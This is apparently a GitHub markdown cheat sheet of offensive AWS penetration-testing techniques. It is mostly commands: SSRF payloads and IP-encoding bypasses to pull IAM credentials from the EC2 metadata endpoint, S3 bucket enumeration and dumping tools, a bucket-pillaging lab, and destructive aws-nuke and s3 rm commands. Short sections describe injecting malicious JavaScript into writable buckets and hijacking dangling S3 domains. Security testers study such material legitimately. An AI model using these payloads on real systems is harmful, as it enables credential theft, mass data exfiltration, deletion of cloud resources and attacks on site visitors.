Skip to content

Latest commit

 

History

History
263 lines (212 loc) · 9.67 KB

cloud-aws.md

File metadata and controls

263 lines (212 loc) · 9.67 KB

Auth methods: • Programmatic access - Access + Secret Key ◇ Secret Access Key and Access Key ID for authenticating via scripts and CLI • Management Console Access ◇ Web Portal Access to AWS

Recon: • AWS Usage ◇ Some web applications may pull content directly from S3 buckets ◇ Look to see where web resources are being loaded from to determine if S3 buckets are being utilized ◇ Burp Suite ◇ Navigate application like you normally would and then check for any requests to: ▪ https://[bucketname].s3.amazonaws.com ▪ https://s3-[region].amazonaws.com/[OrgName]

S3: • Amazon Simple Storage Service (S3) ◇ Storage service that is “secure by default” ◇ Configuration issues tend to unsecure buckets by making them publicly accessible ◇ Nslookup can help reveal region ◇ S3 URL Format: ▪ https://[bucketname].s3.amazonaws.com ▪ https://s3-[region].amazonaws.com/[Org Name] # aws s3 ls s3://bucket-name-here --region # aws s3api get-bucket-acl --bucket bucket-name-here # aws s3 cp readme.txt s3://bucket-name-here --profile newuserprofile

EBS Volumes: • Elastic Block Store (EBS) • AWS virtual hard disks • Can have similar issues to S3 being publicly available • Difficult to target specific org but can find widespread leaks

EC2: • Like virtual machines • SSH keys created when started, RDP for Windows. • Security groups to handle open ports and allowed IPs.

AWS Instance Metadata URL • Cloud servers hosted on services like EC2 needed a way to orient themselves because of how dynamic they are • A “Metadata” endpoint was created and hosted on a non-routable IP address at 169.254.169.254 • Can contain access/secret keys to AWS and IAM credentials • This should only be reachable from the localhost • Server compromise or SSRF vulnerabilities might allow remote attackers to reach it • IAM credentials can be stored here: ◇ http://169.254.169.254/latest/meta-data/iam/security-credentials/ • Can potentially hit it externally if a proxy service (like Nginx) is being hosted in AWS. ◇ curl --proxy vulndomain.target.com:80 http://169.254.169.254/latest/meta-data/iam/security-credentials/ && echo • CapitalOne Hack ◇ Attacker exploited SSRF on EC2 server and accessed metadata URL to get IAM access keys. Then, used keys to dump S3 bucket containing 100 million individual’s data. • AWS EC2 Instance Metadata service Version 2 (IMDSv2) • Updated in November 2019 – Both v1 and v2 are available • Supposed to defend the metadata service against SSRF and reverse proxy vulns • Added session auth to requests • First, a “PUT” request is sent and then responded to with a token • Then, that token can be used to query data

TOKEN=curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600" curl http://169.254.169.254/latest/meta-data/profile -H "X-aws-ec2-metadata-token: $TOKEN" curl http://example.com/?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/ISRM-WAF-Role

Post-compromise • What do our access keys give us access to? • Check AIO tools to do some recon (WeirdAAL- recon_module, PACU privesc,...)

http://169.254.169.254/latest/meta-data http://169.254.169.254/latest/meta-data/iam/security-credentials/

AWS nuke - remove all AWS services of our account

  • Fill nuke-config.yml with the output of aws sts get-caller-identity ./aws-nuke -c nuke-config.yml # Checks what will be removed
  • If fails because there is no alias created aws iam create-account-alias --account-alias unique-name ./aws-nuke -c nuke-config.yml --no-dry-run # Will perform delete operation

Cloud Nuke

cloud-nuke aws

Other bypasses

aws eks list-clusters | jq -rc '.clusters' ["example"] aws eks update-kubeconfig --name example kubectl get secrets

  1. SSRF AWS Bypasses to access metadata endpoint. Converted Decimal IP: http://2852039166/latest/meta-data/ IPV6 Compressed: http://[::ffff:a9fe:a9fe]/latest/meta-data/ IPV6 Expanded: http://[0:0:0:0:0:ffff:a9fe:a9fe]/latest/meta-data/

Interesting metadata instance urls:

http://instance-data http://169.254.169.254 http://169.254.169.254/latest/user-data http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME] http://169.254.169.254/latest/meta-data/ http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME] http://169.254.169.254/latest/meta-data/iam/security-credentials/PhotonInstance http://169.254.169.254/latest/meta-data/ami-id http://169.254.169.254/latest/meta-data/reservation-id http://169.254.169.254/latest/meta-data/hostname http://169.254.169.254/latest/meta-data/public-keys/ http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key http://169.254.169.254/latest/meta-data/public-keys/[ID]/openssh-key http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy http://169.254.169.254/latest/meta-data/iam/security-credentials/s3access http://169.254.169.254/latest/dynamic/instance-identity/document

FIND AWS IN A COMPANY-DOMAIN

# Find subdomains

./sub.sh -s example.com
assetfinder example.com
## Bruteforcing
python3 dnsrecon.py -d example.com -D subdomains-top1mil-5000.txt -t brt

# Reverse DNS lookups
host subdomain.domain.com
host IP

# Bucket finders
python3 cloud_enum.py -k example.com
ruby lazys3.rb companyname
# https://github.com/bbb31/slurp
slurp domain -t example.com

AIO AWS TOOLS

pip3 install -r requirements cp env.sample .env vim .env python3 weirdAAL.py -l

bash install.sh python3 pacu.py import_keys --all ls

Lot of scripts for different purposes, check github

IAM resources finder

smogcloud

Red team scripts for AWS

AWS Bloodhound

S3

aws s3 ls s3:// aws s3api list-buckets aws s3 ls s3://bucket.com aws s3 ls --recursive s3://bucket.com aws s3 sync s3://bucketname s3-files-dir aws s3 cp s3://bucket-name/ aws s3 cp/mv test-file.txt s3://bucket-name aws s3 rm s3://bucket-name/test-file.txt aws s3api get-bucket-acl --bucket bucket-name # Check owner aws s3api head-object --bucket bucket-name --key file.txt # Check file metadata

FIND BUCKETS

Find buckets from keyword or company name

ruby lazys3.rb companyname

python3 cloud_enum.py -k companynameorkeyword

php s3-buckets-bruteforcer.php --bucket gwen001-test002

Public s3 buckets

https://buckets.grayhatwarfare.com https://github.com/eth0izzle/bucket-stream

festin mydomain.com festin -f domains.txt

Google dork

site:.s3.amazonaws.com "Company"

CHECK BUCKETS FOR FILES AND SUCH

alias flumberbuckets='sudo python3 PATH/flumberboozle/flumberbuckets/flumberbuckets.py -p' echo "bucket" | flumberbuckets -si - cat hosts.txt | flumberbuckets -si -

sudo python3 s3scanner.py sites.txt sudo python ./s3scanner.py --include-closed --out-file found.txt --dump names.txt

python s3inspector.py

source /home/cloudhacker/tools/AWSBucketDump/bin/activate touch s.txt sed -i "s,$,-$bapname-awscloudsec,g" /home/cloudhacker/tools/AWSBucketDump/BucketNames.txt python AWSBucketDump.py -D -l BucketNames.txt -g s.txt

python3 find_data.py -n bucketname -u

python3 aws_extender_cli.py -s S3 -b flaws.cloud

S3 EXAMPLE ATTACKS

S3 Bucket Pillaging

• GOAL: Locate Amazon S3 buckets and search them for interesting data • In this lab you will attempt to identify a publicly accessible S3 bucket hosted by an organization. After identifying it you will list out the contents of it and download the files hosted there.

~$ sudo apt-get install python3-pip ~$ git clone https://github.com/RhinoSecurityLabs/pacu ~$ cd pacu ~$ sudo bash install.sh ~$ sudo aws configure ~$ sudo python3 pacu.py

Pacu > import_keys --all

Search by domain

Pacu > run s3__bucket_finder -d glitchcloud

List files in bucket

Pacu > aws s3 ls s3://glitchcloud

Download files

Pacu > aws s3 sync s3://glitchcloud s3-files-dir

S3 Code Injection

• Backdoor JavaScript in S3 Buckets used by webapps • In March, 2018 a crypto-miner malware was found to be loading on MSN’s homepage • This was due to AOL’s advertising platform having a writeable S3 bucket, which was being served by MSN • If a webapp is loading content from an S3 bucket made publicly writeable attackers can upload malicious JS to get executed by visitors • Can perform XSS-type attacks against webapp visitors • Hook browser with Beef

Domain Hijacking

• Hijack S3 domain by finding references in a webapp to S3 buckets that don’t exist anymore • Or… subdomains that were linked to an S3 bucket with CNAME’s that still exist • When assessing webapps look for 404’s to *.s3.amazonaws.com • When brute forcing subdomains for an org look for 404’s with ‘NoSuchBucket’ error • Go create the S3 bucket with the same name and region • Load malicious content to the new S3 bucket that will be executed when visitors hit the site

Amazon Inspector is an automated security assessment service that helps improve the security and compliance of applications deployed on AWS.